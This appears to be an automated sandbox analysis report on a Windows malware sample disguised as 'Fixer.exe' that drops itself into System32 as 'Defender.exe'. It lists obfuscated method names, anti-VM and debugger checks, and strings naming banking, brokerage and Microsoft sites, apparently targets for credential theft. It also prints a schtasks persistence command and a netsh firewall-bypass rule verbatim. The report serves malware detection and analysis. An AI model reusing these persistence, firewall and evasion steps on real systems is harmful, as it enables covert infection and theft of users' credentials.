                  Source: 6z9uno0baqvej0me.exe.0.dr, DablsyKhVktwZXmMx.csHigh entropy of concatenated method names: 'GJKVxgQvPV', 'ydsOfJeQCVbYa', 'jderwMUjgNj', 'hdvVwjoVWGAitO', 'vuhfkkRNDlDS', 'sOwefQcBVhYr', 'FiccwyhFZpziyfQPrjtQf', 'HKWCdmGZMInzejlbpF', 'ESZwwglLleyfbFcaSGtUv', 'zcruyAgeQunfbKhNZWraUvOdM'
                  Source: 6z9uno0baqvej0me.exe.0.dr, MLOzRvMQYDeslGhSiqRrD.csHigh entropy of concatenated method names: 'CNbGrDSdnbyQMNsuzSIDmHHwh', 'OvZLrOhNIBYL', 'IyuQCtVtTZn', 'zizMvGeYkpWEckjizFqVoOA', 'rrECLNvVlUr', 'hBNvtmSTbqoSJnuOjSC', 'iuUDBcMXuBSHsEBysvbCv', 'eBDltYShmTSGwngJtRZ', 'ZZXgaFmwVnqAqCPSzPjnENPz', 'mHNRiCJczHEeWLnmWLzcSQ'
                  Source: 6z9uno0baqvej0me.exe.0.dr, wEmPlHwvhkVaXVXBaeahaqAX.csHigh entropy of concatenated method names: 'mVGvXKixJGKPShLgxTQRR', 'DSxNmbKUFEOd', 'lqAJZncNPNmHwPAcXkGTdSoxK', 'GnpAGApjZqxJqeown', 'LFpMJriUIJV', 'CCzBgpYPGlSNpKfO', 'cfhejlEiudxSmsfNGouJpxzX', 'yamcXzMTageopTRvS', 'LaxUtnzjVlFEefJGlLSGW', 'kyLLAZQVdOXKnxbdgzc'
                  Source: 6z9uno0baqvej0me.exe.0.dr, YgTRUqGyvMDPAwIs.csHigh entropy of concatenated method names: 'fLfZnpCMphhn', 'QYIhRtBHNJYx', 'aZFOqCvjkyFwkrREfJYK', 'vfHTfOrARCGcHOcHbqesZ', 'ZDkgCjCizznueuyvLnDj', 'wyUdcoxESuSNOFD', 'yMIyiCHpNkiIgfqoqOdF', 'DavFehFUgPouMMb', 'ljtqfQrFoYnDdXAbxRumMsEU', 'UgVtNTSPsF'
                  Source: 6z9uno0baqvej0me.exe.0.dr, wdeXDEGcBGXHfb.csHigh entropy of concatenated method names: 'jqVCxngNkCJLbpWAhWqYuD', 'xyOjvRjBjAzlFnTqcQPtVutem', 'GploDvgqXDiDkvBAZLb', 'RMOfNIfJeCF', 'xQLtQvwEFOPPHZfTsUVhC', 'NtbFavQWMUxzGUkHkeOX', 'CxyYocLRKhXhODRSKUBoiCuSI', 'LjljqTfjLwdhlSE', 'BnZRrQTpaJN', 'QzCgPWRcgaqEBfsUpcii'
                  Source: 6z9uno0baqvej0me.exe.0.dr, IGWfOAHKzj.csHigh entropy of concatenated method names: 'INjbkoTBDyDO', 'wmyuTvpUiWQ', 'AqsFUenQBM', 'jQbBhUpDFsQjcCMqDunZrTYk', 'bwjUQxEkrOeruIAtSLKjHQCIo', 'WOmDPsrEFYFjpvLyknhzJ', 'nfYHNBqLubgfaqxoymzqC', 'njWPXIgOaoblaGeIeq', 'udeDJVVBvovzTj', 'rpkydhffArEoP'
                  Source: 6z9uno0baqvej0me.exe.0.dr, rLSyZeyiGXQodFFJuqzb.csHigh entropy of concatenated method names: 'jiyzoISeTlwlTJHcrob', 'USYqMKRKXONmGEIdT', 'kWfDmmUCJvyhCCXCIQJHndrHH', 'XJeOBdItDFt', 'fmWJBVMqMKPDwrT', 'LGfXvhOKYuuUY', 'ySJrkXlecVvR', 'NuaSKKwiwZWWyXLlHbsRDMx', 'FGwbheKbdoBQxbkKcbBtmUmA', 'sUuCAqAxgNDNVASPu'
                  Source: 6z9uno0baqvej0me.exe.0.dr, OdvZLjiZSxuvnfJkBWEwenrQv.csHigh entropy of concatenated method names: 'fijjjKQXRKunlovkWbVST', 'LZySRCSamfdbDzqjOj', 'QOzqOlQAtRPudQCWKkQ', 'NEqXPJJkwumNlnDOMjkhBCZ', 'XkAKBcgzxqRL', 'cbFbgDyeBJpNnKbAj', 'LehAeIziTOnQvWrqkIfFVya', 'VbKwNSFzNyFgqcwwcxk', 'rlNTWxaSVeWNEDeCxCUBJ', 'CwQKAHLidYNqmjOraQrmdj'
                  Source: FixerNerest.exe.0.dr, GprCBzVajSFPhcvMz.cs High entropy of concatenated method names: '_003CPatchMem_003Eb__0', 'WYpgNUnjwEYMhBcgWYlMeqbwj', 'NMmrnMiPoxTKxWYciysWlr', 'QuyKVUgxswZG', 'wFQLeSMeNMbPoBIdEM', 'WEVxpCMvIA', 'NYQxfchgsTfdDiXvhS', 'UokWjXaHbJRXEemyC', 'rWfvXTjrbSPRGfcjfldCgaFVG', 'bwbyQjVwqwtZQQnsv'
                  Source: Defender.exe.4.dr, GprCBzVajSFPhcvMz.cs High entropy of concatenated method names: '_003CPatchMem_003Eb__0', 'WYpgNUnjwEYMhBcgWYlMeqbwj', 'NMmrnMiPoxTKxWYciysWlr', 'QuyKVUgxswZG', 'wFQLeSMeNMbPoBIdEM', 'WEVxpCMvIA', 'NYQxfchgsTfdDiXvhS', 'UokWjXaHbJRXEemyC', 'rWfvXTjrbSPRGfcjfldCgaFVG', 'bwbyQjVwqwtZQQnsv'
                  Source: Defender.exe.4.dr, uJXvYHzEhxLOfc.csHigh entropy of concatenated method names: 'SNWxJjZpddDWZAUIe', 'dlfCzIGMwkhjbfRrwqr', 'seUTuRVlaDMphkC', 'uPOOrxnoHtCXEhEeRMmzQLI', 'mVlsYsCqdaxgcdavqfMA', 'xgsziYVyCaiHfb', 'LvQPrLuekYComqIl', 'HUpottpUgsazPYwBEjvOwJCDC', 'agjiHupiALlg', 'CauKTTeVAFmhGMW'
                  Source: Defender.exe.4.dr, JqoyJMwYkYeSSSLBCERtJfL.csHigh entropy of concatenated method names: '_003CRun_003Eb__1_0', 'eiLcBLWnxSzTbooKAH', 'jdfmOziWNDFxt', 'shTrcPinsNklrCmXVRYOlwywx', 'TpJjrUFVjGVTYscvlSC', 'IfkphnZeMviWtzvseI', 'PfVTfCCtglpKgtVV', 'FTBDubJoYyZZwjRdwmwmME', 'fustWkCcYdHnKGSUEMfHE', 'UkBYhkHYicAhWJCimD'
                  Source: Defender.exe.4.dr, huigHuEqBhxV.csHigh entropy of concatenated method names: 'xSzRXLdUGGB', 'ZKUsvmanhRBy', 'vZyEKNVIgqk', 'NjhhmbnhYi', 'jyFuXiXfRAOclfQwtfzt', 'jqhDsFvqNReNpOGE', 'yaILTBzHwBVeuCZ', 'PzHYqfccpDjjPvRJsagYlI', 'phwwEZLTPFYaOy', 'cTxgVQRQrAkMmUVADGj'
                  Source: Defender.exe.4.dr, sDxpENeYXPsYVcYDBrZBiKvaq.csHigh entropy of concatenated method names: 'lMRPIUZJwfRESTctpRH', 'OqlcEVUlOiIWzabSHIGXy', 'gslwZGZpUeTDP', 'apKnAnvOXvErrJmgKjnCKsrI', 'NMYNeCvKgrRyTXLQRVpshPPD', 'TjQNkhxCqmbWAssIhLSUir', 'clsXBPPywVaKT', 'xvJUwdkjuRcxjADxjFc', 'obsKwmboeAaiZdjPI', 'mObsrauEgP'
                  Source: Defender.exe.4.dr, WYdQIVjMOZZzFKSg.csHigh entropy of concatenated method names: 'xVmIWWPGmNsQwHeZFZzsKD', 'NuZjXgamrjtndQMzBOKVIqvS', 'vZAlToetaYNwnsa', 'aAhCTAJsZydAh', 'WzHRbHaBYuPtDryDNVjJi', 'NPyuPHLUKdMnCOpWQTkZbmn', 'xSuWkIRYEflrShrTp', 'jlhPokNqFQZ', 'ObbZxxNpjCMn', 'WcxEjbQkXCCrhdJIuCAz'
                  Source: Defender.exe.4.dr, fIEdZvXcpYAipTNh.csHigh entropy of concatenated method names: 'EgSyrpMyfurJMCyrIsjumlKCY', 'AfbyDBzvzsXWnTre', 'BgSdVCqgadnKTVPaVohXhqp', 'RCFUmFQCIrJVF', 'edkScYMkfXHwReKGLKrILSw', 'tVNkCcLuVcJDnPOR', 'hXiMpnlsBfzewhMgNYHLbiDLN', 'pUGTwwZKevOKEibsAw', 'PYvxWZqGGWyTW', 'OxRliiDElDQSDUZjjhHzxCuWk'
                  Source: Defender.exe.4.dr, ueHNMdjwjYBvgC.csHigh entropy of concatenated method names: 'KVvAMKuWDzYAKXvnmxTAjYSYH', 'HXDGRMJZqUXHDFzIEOodZY', 'lOxMCNlCXtXCXSwiLrkgaP', 'uOBbUEkdOjjSrTzGLFR', 'OfCbpHgcmo', 'NWjDyBlQynPJToAEOMkYbJO', 'OMZmMXIrasVwIQB', 'aoSMyWjnpCR', 'CPPDHSombzDbfX', 'bSDwyLeymqBSsclwKGsp'
                  Source: Defender.exe.4.dr, VgiXrAmmXM.csHigh entropy of concatenated method names: 'RlSpcTxUImVHRJThXP', 'UFtJFrybKqoQQdWbgICKPSM', 'PAZQNYTOWgsWXcMy', 'rneUWEdvinYVFcBsZtF', 'iOmWZtklADDvEfX', 'izsvvVekutRDrdyiHfw', 'BHvdTruejdQZEVJaBJW', 'jBcfbguXFVoYj', 'ebEPcDbAAQcrzVTXhxJjtzeP', 'mxWYOospJq'
                  Source: Defender.exe.4.dr, EiphzSFywDsQvfJ.csHigh entropy of concatenated method names: 'UguORtUtzui', 'dkKlBYhllU', 'PQlvpndBHrv', 'ulpsNbUzFBfoNQWBjyB', 'AZfxgyeGWsbIhFQA', 'fUKRUAOlwiYQb', 'IqbeUFrMPwNdNZW', 'HAWpDeqCfYQL', 'QGpuZSSGbwuUTFODrnoPp', 'YumPezZyvofczqYioH'

                  Persistence and Installation Behavior

                  Source: unknown; Executable created and started: C:\Windows\System32\Defender.exe
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exe; File created: C:\Windows\System32\Defender.exe
                  Source: C:\Users\user\Desktop\Fixer.exe; File created: C:\Users\user\AppData\Local\Temp\FixerNerest.exe
                  Source: C:\Users\user\Desktop\Fixer.exe; File created: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe

                  Boot Survival

                  Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc minute /mo 1 /tn "Microsoft\WindowsAPI" /tr "C:\Windows\System32\Defender.exe" /RL HIGHEST

                  Hooking and other Techniques for Hiding and Protection

                  Source: unknown; Network traffic detected: HTTP traffic on port 49705 -> 1911
                  Source: unknown; Network traffic detected: HTTP traffic on port 1911 -> 49705
                  Source: C:\Users\user\Desktop\Fixer.exe; Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe; Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exe; Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\Defender.exe; Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exe; Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\System32\WerFault.exe; Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
                  Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from CIM_Memory
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE PNPClass = 'Camera'
                  Source: C:\Windows\System32\Defender.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE PNPClass = 'Camera'
                  Source: C:\Users\user\Desktop\Fixer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                  Source: C:\Windows\System32\Defender.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                  Source: C:\Users\user\Desktop\Fixer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Windows\System32\Defender.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\Fixer.exeMemory allocated: 1940000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\Fixer.exeMemory allocated: 32A0000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\Fixer.exeMemory allocated: 52A0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeMemory allocated: 980000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeMemory allocated: 1A6F0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeMemory allocated: A80000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeMemory allocated: 1A7D0000 memory reserve | memory write watch
                  Source: C:\Windows\System32\Defender.exeMemory allocated: EF0000 memory reserve | memory write watch
                  Source: C:\Windows\System32\Defender.exeMemory allocated: 1A9B0000 memory reserve | memory write watch
                  Source: C:\Windows\System32\Defender.exeMemory allocated: AE0000 memory reserve | memory write watch
                  Source: C:\Windows\System32\Defender.exeMemory allocated: 1A530000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeCode function: 3_2_00007FF848F270FA rdtsc 3_2_00007FF848F270FA
                  Source: C:\Users\user\Desktop\Fixer.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\Desktop\Fixer.exeWindow / User API: threadDelayed 2546
                  Source: C:\Users\user\Desktop\Fixer.exeWindow / User API: threadDelayed 7174
                  Source: C:\Users\user\Desktop\Fixer.exe TID: 7088Thread sleep time: -35971150943733603s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe TID: 2616Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exe TID: 6768Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\Desktop\Fixer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Windows\System32\Defender.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\System32\Defender.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Windows\System32\Defender.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\System32\Defender.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: Fixer.exe, 00000000.00000002.2202938412.000000000363D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                  Source: Fixer.exe, 00000000.00000002.2202938412.000000000363D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                  Source: Amcache.hve.14.drBinary or memory string: VMware
                  Source: Fixer.exe, 00000000.00000002.2202938412.000000000363D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
                  Source: Amcache.hve.14.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: Fixer.exe, 00000000.00000002.2202938412.000000000363D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
                  Source: Fixer.exe, 00000000.00000002.2202938412.000000000363D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                  Source: Amcache.hve.14.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                  Source: Fixer.exe, 00000000.00000002.2202938412.000000000363D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                  Source: Fixer.exe, 00000000.00000002.2202938412.000000000363D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                  Source: Amcache.hve.14.drBinary or memory string: vmci.sys
                  Source: Fixer.exe, 00000000.00000002.2202938412.000000000363D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                  Source: Amcache.hve.14.drBinary or memory string: VMware20,1
                  Source: Amcache.hve.14.drBinary or memory string: Microsoft Hyper-V Generation Counter
                  Source: Amcache.hve.14.drBinary or memory string: NECVMWar VMware SATA CD00
                  Source: Amcache.hve.14.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                  Source: Amcache.hve.14.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                  Source: Fixer.exe, 00000000.00000002.2248222943.00000000085AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
                  Source: Amcache.hve.14.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                  Source: Amcache.hve.14.drBinary or memory string: VMware PCI VMCI Bus Device
                  Source: Amcache.hve.14.drBinary or memory string: VMware VMCI Bus Device
                  Source: Fixer.exe, 00000000.00000002.2202938412.000000000363D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                  Source: Fixer.exe, 00000000.00000002.2202938412.000000000363D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                  Source: Amcache.hve.14.drBinary or memory string: VMware Virtual RAM
                  Source: Amcache.hve.14.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                  Source: Fixer.exe, 00000000.00000002.2202938412.000000000363D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                  Source: Amcache.hve.14.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                  Source: Amcache.hve.14.drBinary or memory string: VMware Virtual USB Mouse
                  Source: Fixer.exe, 00000000.00000002.2202938412.000000000363D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                  Source: Amcache.hve.14.drBinary or memory string: vmci.syshbin
                  Source: Amcache.hve.14.drBinary or memory string: VMware, Inc.
                  Source: Amcache.hve.14.drBinary or memory string: VMware20,1hbin@
                  Source: Amcache.hve.14.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                  Source: Fixer.exe, 00000000.00000002.2202938412.000000000363D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                  Source: Amcache.hve.14.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                  Source: Fixer.exe, 00000000.00000002.2202938412.000000000363D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
                  Source: Fixer.exe, 00000000.00000002.2202938412.000000000363D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                  Source: Amcache.hve.14.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Fixer.exe, 00000000.00000002.2202938412.000000000363D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                  Source: Fixer.exe, 00000000.00000002.2202938412.000000000363D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
                  Source: Fixer.exe, 00000000.00000002.2202938412.000000000363D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                  Source: Amcache.hve.14.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                  Source: Amcache.hve.14.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: Defender.exe, 0000000B.00000002.2591740114.000000001B5CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: Fixer.exe, 00000000.00000002.2202938412.000000000363D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                  Source: Fixer.exe, 00000000.00000002.2202938412.000000000363D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: discord.comVMware20,11696428655f
                  Source: Fixer.exe, 00000000.00000002.2202938412.000000000363D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office.comVMware20,11696428655s
                  Source: Amcache.hve.14.dr | Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                  Source: Amcache.hve.14.dr | Binary or memory string: vmci.syshbin`
                  Source: Amcache.hve.14.dr | Binary or memory string: \driver\vmci,\driver\pci
                  Source: Fixer.exe, 00000000.00000002.2202938412.000000000363D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: tasks.office.comVMware20,11696428655o
                  Source: Amcache.hve.14.dr | Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Fixer.exe, 00000000.00000002.2202938412.000000000363D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                  Source: Fixer.exe, 00000000.00000002.2232436978.0000000006858000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll<K
                  Source: Fixer.exe, 00000000.00000002.2202938412.000000000363D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: AMC password management pageVMware20,11696428655
                  Source: Amcache.hve.14.dr | Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                  Source: Fixer.exe, 00000000.00000002.2202938412.000000000363D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                  Source: Fixer.exe, 00000000.00000002.2202938412.000000000363D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                  Source: Fixer.exe, 00000000.00000002.2202938412.000000000363D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.comVMware20,11696428655
                  Source: Fixer.exe, 00000000.00000002.2202938412.000000000363D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                  Source: Fixer.exe, 00000000.00000002.2202938412.000000000363D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                  Source: Defender.exe, 00000011.00000002.2761764861.000000001B175000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW %SystemRoot%\system32\mswsock.dllchineSettingsSection, SMDiagnostics, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" allowDefinition="MachineOnly" allowExeDefinition="MachineOnly"/>
                  Source: Fixer.exe, 00000000.00000002.2202938412.000000000363D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                  Source: Fixer.exe, 00000000.00000002.2202938412.000000000363D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: bankofamerica.comVMware20,11696428655x
                  Source: C:\Users\user\Desktop\Fixer.exe | Process information queried: ProcessInformation
                  Source: C:\Windows\System32\Defender.exe | Process queried: DebugPort
                  Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe | Code function: 3_2_00007FF848F270FA rdtsc 3_2_00007FF848F270FA
                  Source: C:\Users\user\Desktop\Fixer.exe | Process token adjusted: Debug
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exe | Process token adjusted: Debug
                  Source: C:\Windows\System32\Defender.exe | Process token adjusted: Debug
                  Source: C:\Users\user\Desktop\Fixer.exe | Memory allocated: page read and write | page guard
                  Source: C:\Users\user\Desktop\Fixer.exe | Process created: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe "C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe"
                  Source: C:\Users\user\Desktop\Fixer.exe | Process created: C:\Users\user\AppData\Local\Temp\FixerNerest.exe "C:\Users\user\AppData\Local\Temp\FixerNerest.exe"
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exe | Process created: C:\Windows\System32\cmd.exe "CMD" netsh advfirewall firewall add rule name=",%MUc}<NcMKXc_" dir=in action=allow program="C:\Windows\System32\Defender.exe" enable=yes & exit
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exe | Process created: C:\Windows\System32\cmd.exe "cmd" /c schtasks /create /f /sc minute /mo 1 /tn "Microsoft\WindowsAPI" /tr "C:\Windows\System32\Defender.exe" /RL HIGHEST & exit
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc minute /mo 1 /tn "Microsoft\WindowsAPI" /tr "C:\Windows\System32\Defender.exe" /RL HIGHEST
                  Source: C:\Users\user\Desktop\Fixer.exe | Queries volume information: C:\Users\user\Desktop\Fixer.exe VolumeInformation
                  Source: C:\Users\user\Desktop\Fixer.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\Desktop\Fixer.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\user\Desktop\Fixer.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Users\user\Desktop\Fixer.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                  Source: C:\Users\user\Desktop\Fixer.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                  Source: C:\Users\user\Desktop\Fixer.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
